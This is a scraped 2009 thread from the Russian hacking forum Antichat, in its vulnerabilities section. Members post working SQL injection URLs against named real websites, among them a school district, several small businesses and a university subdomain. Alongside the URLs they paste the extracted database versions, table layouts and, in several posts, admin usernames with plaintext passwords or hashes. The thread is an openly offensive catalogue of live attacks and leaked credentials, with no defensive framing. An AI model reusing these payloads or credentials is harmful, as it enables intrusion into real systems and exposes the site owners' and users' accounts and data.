ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9691  
Старый 05.06.2009, 17:00
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.motokater.ru/razbor.php?show=-43+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696 E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User( ),0x7873716C696E6A656E64),3,4

Database Version: 5.0.77-community-log
Database name: motokate_db
User name: motokate_user@localhost


Код:
Database [motokate_db]
    Table [mk_greases  ( Rows)]
        greases_id
        greases_name
    Table [mk_manags  ( Rows)]
        manags_id
        manags_name
    Table [mk_motors  ( Rows)]
        motors_id
        manags_id
        starts_id
        raiseis_id
        greases_id
        motors_name
        motors_price
        motors_cylnum
        motors_img
        motors_order
    Table [mk_raiseis  ( Rows)]
        raiseis_id
        raiseis_name
    Table [mk_starts  ( Rows)]
        starts_id
        starts_name
    Table [mk_users  ( Rows)]
        users_id
        users_login
        users_password
    Table [moto  ( Rows)]
        id
        model
        type
        price
        description
        obem
    Table [razbor  ( Rows)]
        id
        model
        price
        description
    Table [spec  ( Rows)]
        id
        model
        price
        description
    Table [user_ugolok  ( Rows)]
        text
    Table [yacht  ( Rows)]
        id
        model
        price
        description
Заинтересовала таблица mk_users
1: putin:21232f297a57a5a743894a0e4a801fc3

тот самый путин?
 
Ответить с цитированием

  #9692  
Старый 05.06.2009, 17:05
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

Каталог Lookfor PR 2

Цитата:
http://lookfor.ws/feedback/article.php?nomer=-1+union+select+concat_ws(0x202d20,version(),user() ,database(),@@tmpdir,@@datadir),concat_ws(0x3a,@@b asedir,@@version_compile_os),3,4
Version() - 5.0.51a-3ubuntu5
Database() - lookfor
User() - root@localhost

Админка http://lookfor.ws/admin/admin.php - взломать не удалось, в бд пароли от word press.

P.S админка злостно матерится)
 
Ответить с цитированием

  #9693  
Старый 05.06.2009, 17:18
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

PR 3

http://www.hflcsd.org/staffpages/staffmemberpage.php?id=-619+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT( 0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Da tabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) ,0x71),0x71),3/*

Database Version: 4.1.13a-log
Database name: hflcsd_db
User name: hflcsduser@webserver3.monroe.edu


Есть таблица: admin
подобрал поля: email,id,password

allison_armstrong@hflcsd.org:1:s4n5t6
 
Ответить с цитированием

  #9694  
Старый 05.06.2009, 17:22
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

http://www.marafon.com.ua
Цитата:
http://www.marafon.com.ua/outnews.php?id=-14+UNION+SELECT+0,concat_ws(0x0b,user(),version(), data base()),2,3
marafon@localhost
4.1.22-standard
marafon_test1

http://www.wollemipine.com.ua
Цитата:
http://www.wollemipine.com.ua/page.php?id=-10+UNION+SELECT+0,1,concat_Ws(0x0b,user(),database (),version ( )),3,4,5+--+&lang=uar&PHPSESSID=0aa53becbebdf7dca5626e3872fba 7db
db11330xwp@82.119.226.130
db11330xwp
4.1.22

http://www.euroizol.com
Цитата:
http://www.euroizol.com/products/view.php?id=-18+UNION+SELECT+0,1,2,3,4,5,6,concat_ws(0x0b,user( ),databa se(),version()),8,9,10,11,12,13,14,15,16
ftp00001252_dbu@localhost
ftp00001252_db
5.0.37

Юзеры
Цитата:
http://www.euroizol.com/products/view.php?id=-18+UNION+SELECT+0,1,2,3,4,5,6,concat_ws(0x0b,us_lo gin,us_pass),8,9,10,11,12,13,14,15,16+FROM+ei_user s+LIMIT+1,1
Логин: gkadm
Пасс: siteadmin
Логин: solyanov
Пас: kruto

Админка но пассы не подходят
http://www.euroizol.com/admin.php


http://www.restin.crimea.ua
Цитата:
http://www.restin.crimea.ua/comment_kp.php?id=-65539+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_w s(0x0b,user(),version(),database()),11,12,13,14,15 ,16,17,18&date=1244148184&type=&month=&location=&a partment=&photo=
dbuser@localhost
4.1.22-log
restincr_restin



http://www.odessamik.org.ua
http://www.odessamik.org.ua/main.php?id=415+UNION+SELECT+0,concat_Ws(0x0b,u ser(),databa se(),version()),2,3,4
u_odessamik@localhost
odessamik
4.1.22
 
Ответить с цитированием

  #9695  
Старый 05.06.2009, 18:15
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.chineselawcf.com/show.php?id_a=19285+union+select+1,2,3,4,database( ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24+/*+

http://www.mua.no/student.php?student_id=-8792'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,c oncat_ws(0x3a3a,user,passwd),15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71, 72,73,74,75,76,77+from+user+--+
admin::43e9a4ab75570f5b

pr5
http://www.bothnian.net/FoskJR/student.php?student_id=-20+union+select+1,2,3,user,password,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22+from+mysql.user+/*+
roo::6cd538b23444e59e

pr5
http://www.parkviewamc.org/contact/doctor.php?ID=-154+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24+/*+

http://www.coopervision.ru/doctor.php?id=-5+union+select+1,2,3,4+--+

http://www.dentalpalace.ru/actions.php?id=-4+union+select+1,2,3,4,5,6+/*+

http://www.smartis.ru/test/dental/actions.php?id=-2+union+select+1,concat(table_name),3,4,5,6+from+i nformation_schema.tables+/*+
 
Ответить с цитированием

  #9696  
Старый 05.06.2009, 18:44
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://www.zazieweb.fr/site/reagir.php?num=-107+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3 ,4,5/*

Последний раз редактировалось jokester; 05.06.2009 в 20:06.. Причина: cahiersdufootball.net БОЯН
 
Ответить с цитированием

  #9697  
Старый 05.06.2009, 19:00
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994

Репутация: 104
По умолчанию

http://www.technolider.com.ua/

Цитата:
http://www.technolider.com.ua/news.php?id=-1+union+select+1,2,3,concat_ws(char(124),version() ,database(),user())--
5.0.67-community|technoli_products|technoli_kox@localhost

==================================================

http://www.cpofla.org/

Цитата:
http://www.cpofla.org/news.php?id=-1+union+select+1,2,3,4,concat_ws(char(124),version (),database(),user()),6,7,8,9,10,11,12--
5.0.51a-community|cdgajywl_smf1|cdgajywl_smf1@localhost

==================================================

http://www.orient-ufa.ru/

Цитата:
http://www.orient-ufa.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(char(124),v ersion(),database(),user()),9,10--
5.0.77-community-log|orientuf_realt|orientuf@localhost

==================================================

http://www.gorod-na-ozere.com.ua/

Цитата:
http://www.gorod-na-ozere.com.ua/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(124),versi on(),database(),user())--
5.0.67-community-log|gorod|gorod@localhost

Последний раз редактировалось jokester; 05.06.2009 в 20:02.. Причина: ekomtech.kiev.ua tmx.kiev.ua belt-wrestling.org northwestu.edu snobsmu.com
 
Ответить с цитированием

  #9698  
Старый 05.06.2009, 19:54
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Код:
 http://neolit.psu.ru/usr_intro1.php?sel_id=19{SQLINJ}

Один из поддоменов Пермского гос. универа

Таблы: phpbb_users,test
 
Ответить с цитированием

  #9699  
Старый 05.06.2009, 20:04
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994

Репутация: 104
По умолчанию

http://i-kiev.com/

Цитата:
http://i-kiev.com/pages/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(124),versi on(),database(),user())--
5.0.75-community-log|fouahtun_ikyiv|fouahtun_guest@localhost

Последний раз редактировалось jokester; 05.06.2009 в 20:09.. Причина: strangefortune.com gomountainlions.com marotori.com БОЯНы
 
Ответить с цитированием

  #9700  
Старый 05.06.2009, 22:04
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

ЕДИНАЯ ТАКСОФОННАЯ КАРТА РОССИИ

http://etcard.ru/page.php?item=-page01'+union+select+1,2,concat_ws(0x3a,database() ,version(),user()),4,5%23

nevodspbru:5.0.26-log:nevodspbru@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ